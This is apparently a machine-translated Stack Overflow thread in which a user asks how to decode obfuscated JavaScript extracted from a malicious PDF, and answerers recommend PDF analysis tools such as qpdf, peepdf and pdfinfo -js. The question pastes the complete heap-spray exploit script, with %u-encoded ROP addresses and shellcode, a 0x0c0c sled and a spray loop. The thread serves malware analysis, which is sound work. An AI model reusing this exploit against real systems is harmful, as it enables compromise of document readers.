那些遇到过的问题

从恶意PDF中提取JavaScript

Hun*_*len 5 javascript pdf malware

我有一个PDF文件,我知道一个事实包含一个JavaScript脚本文件,它做了恶意的事情,不知道在这一点上是什么.

我已经成功解压缩了PDF文件并获得了明文JavaScript源代码,但是代码本身如果隐藏在这种语法中我以前没有见过.

代码示例:这是大多数代码的样子

var bDWXfJFLrOqFuydrq = unescape;
var QgFjJUluesCrSffrcwUwOMzImQinvbkaPVQwgCqYCEGYGkaGqery = bDWXfJFLrOqFuydrq( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692....')
Run Code Online (Sandbox Code Playgroud)

我想这个带有长变量/函数名称和隐藏文本字符的符号会混淆那些寻找这类事物的扫描仪.

两个问题:

问题1

有人可以告诉我这叫什么%u4141

问题2

是否有一些工具可以将该符号转换为明文,以便我可以看到它在做什么?

完整的JS代码:

var B = unescape('%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uadba%u8e19%uda62%ud9cb%u2474%u58f4%uc931%u49b1%u5031%u8314%ufce8%u5003%u4f10%u72ec%u068a%u8b0f%u784b%u6e99%uaa7a%ufbfd%u7a2f%ua975%uf1c3%u5adb%u7757%u6df4%u3dd0%u4322%uf0e1%u0fea%u9321%u4d96%u7376%u9da6%u728b%uc0ef%u2664%u8fb8%ud6d7%ud2cd%ud7eb%u5901%uaf53%u9e24%u0520%ucf26%u1299%uf760%u7c92%u0651%u9f76%u41ad%u6bf3%u5045%ua2d5%u62a6%u6819%u4a99%u7194%u6ddd%u0447%u8e15%u1efa%uecee%uab20%u57f3%u0ba2%u66d0%ucd67%u6593%u9acc%u69fc%u4fd3%u9577%u6e58%u1f58%u541a%u7b7c%uf5f8%u2125%u0aaf%u8d35%uae10%u3c3d%uc844%u291f%ue6a9%ua99f%u71a5%u9bd3%u296a%u907b%uf7e3%ud77c%u4fd9%u2612%uafe2%ued3a%uffb6%uc454%u94b6%ue9a4%u3a62%u45f5%ufadd%u25a5%u928d%ua9af%u82f2%u63cf%u289b%ue435%u0464%ufd34%u560c%ue837%udf7f%u78d1%u8990%u154a%u9009%u8401%u0fd6%u866c%ua35d%u4990%uce96%u3e82%u8556%ue9f9%u3069%u1597%ubefc%u413e%ubc68%ua567%u3f37%ubd42%ud5fe%uaa2d%u39fe%u2aae%u53a9%u42ae%u070d%u77fd%u9252%u2b91%u1cc7%u98c0%u7440%uc7ee%udba7%u2211%u2036%u0bc4%u50bc%u7862%u417c');

var C = unescape("%"+"u"+"0"+"c"+"0"+"c"+"%u"+"0"+"c"+"0"+"c");

while (C.length + 20 + 8 < 65536) C+=C;

D = C.substring(0, (0x0c0c-0x24)/2);

D += B;
D += C;
E = D.substring(0, 65536/2);
while(E.length < 0x80000) E += E;
F = E.substring(0, 0x80000 - (0x1020-0x08) / 2);
var G = new Array();
for (H=0;H<0x1f0;H++) G[H]=F+"s";?
Run Code Online (Sandbox Code Playgroud)

Kur*_*fle 16

看起来您已经从PDF中提取了JavaScript.你的问题似乎是分析这个JavaScript.

因为这个话题(混淆和隐藏在无害看PDF文件中的恶意JavaScript代码)似乎越来越成为恶意软件作者更受欢迎,让我列举一些工具和网站,其中校对是有帮助的人谁在剖析这种类型的威胁是一个初学者:

  1. 迪迪埃史蒂文斯的PDF工具
  2. Didier Stevens的PDF恶意软件截屏视频(在YouTube上)的第1部分(很多)
  3. Jay Berkenbilt的QPDF:用于内容保留PDF转换的实用程序(用于解压缩PDF中所有/大多数压缩对象的有用命令:
    qpdf --qdf original.pdf unpacked.pdf
    然后在文本编辑器中打开unpacked.pdf)
  4. Julia Wolf关于PDF恶意软件混淆的演讲
  5. peepdf:用于探索PDF的Python工具(查明它们是否是恶意的)
  6. PDFTricks: PDF源代码混淆方法的(非详尽的)列表
  7. Wepawet: analayse PDF/Javascript/Flash文件的在线资源(生成报告)
  8. Origami-PDF:用于分析和生成恶意PDF的Ruby工具
  9. (......这里没有列出更多的资源...)

我不知道你是如何解析你在问题中提供的Javascript片段.但是,无论如何,不​​要依赖于在PDF 中找到所有 JS代码 - 除非您是PDF专家,他知道在哪里查看以及如何发现所有可能的混淆.(我建议你在你的源PDF中应用3号工具,根据第6号中的tipp看看生成的PDF ...其他工具可能需要更多的PDF语法学习才能真正使它们变得有用给你.)

更新

这是我(近3年)旧答案的更新.值得一提的是:

  1. pdfinfo -js:最新的(基于Poppler的!,而不是基于XPDF的)版本pdfinfo(从2013年12月11日发布的v0.25.0开始)现在知道-js命令行参数,该参数打印出嵌入在PDF文件中的JavaScript代码.

    这个工程即使对于许多病例中/JavaScript的PDF源代码中的名称是通过使用模糊(正式法律)PDF名构造如/4Aavascript/J#61v#61script或相似.

    不幸的是,这个奇妙的功能增加pdfinfo仍然知之甚少.请分享!

更新2

另一个更新,因为上面提到的peepdf工具最近得到了extract子命令:

  1. peepdf.js:这是一个基于Python的命令行工具,可以分析PDF文件.它是由Jose Miguel Esparza开发的,主要是为了"找出文件是否有害",但对于PDF文件结构的一般探索也非常有用.

    安装和使用:

    1. 克隆GitHub存储库:
      git clone https://github.com/jesparza/peepdf git.peepdf.
    2. 创建一个peepdf.py脚本的符号链接,并将其放在您的$PATH:
      cd git.clone ;
      ln -s $(pwd)/peepdf.py ${HOME}/bin/peepdf.py
    3. 以交互模式运行,打开PDF文件:
      peepdf.py -fil my.pdf

    4. 使用该extract js > all-js-in-my.pdf命令将包含在其中的所有JavaScript提取并重定向my.pdf到文件中.这由以下屏幕截图描述:

Tra*_*ebb 1

这些可能是内存地址、操作系统调用、堆喷射等等。

线索是调用的函数是unescape. 获取您想要unescape该文本的实际值。有一些用于取消转义文本的在线工具,例如http://www.web-code.org/coding-tools/javascript-escape-unescape-converter-tool.html

结果很可能是 ASCII 中的垃圾,但您可以尝试将其插入十六进制编辑器,看看是否可以从中理解更多内容。如果病毒扫描程序可以识别该文件的感染源,也许您可​​以对该特定恶意软件进行更多研究并找出该代码的用途。

为了科学的利益,启动一个 Windows VM,运行它,看看它会做什么:)

归档时间:

查看次数:

6599 次

最近记录:

9 年,8 月 前
相关归档
Javascript .map文件 - javascript源地图 324
如何在JavaScript中使用格式规范将字符串转换为日期时间? 198
如何将图像添加到画布 96
如何在JavaScript中使用格式"mm/dd/yyyy"验证日期? 88
如何使用dataTables.js库隐藏"显示N个条目中的1个" 84
为什么Javascript负数不总是真或假? 50
有没有办法告诉Chrome Web调试器在页面坐标中显示当前鼠标位置? 47
飞碟,Thymeleaf和春天 16
Zend_Pdf添加文本链接到pdf页面 5
Android 打印框架 - 将自定义 pdf 静默打印到预定打印机 3
难疑归档
如何在JavaScript中获取查询字符串值? 2701
如何在JavaScript中检查empty/undefined/null字符串? 2645
在jQuery中添加表行 2331
如何在Ruby中编写switch语句 2026
ssh"权限太开放"错误 1859
如何检查Bash中是否设置了变量? 1417
我在哪里将'assets'文件夹放在Android Studio中? 1366
为什么在允许某些Unicode字符的注释中执行Java代码? 1326
命名类 - 如何避免将所有内容称为"<WhatEver> Manager"? 1147
如何从git存储库中删除目录? 1138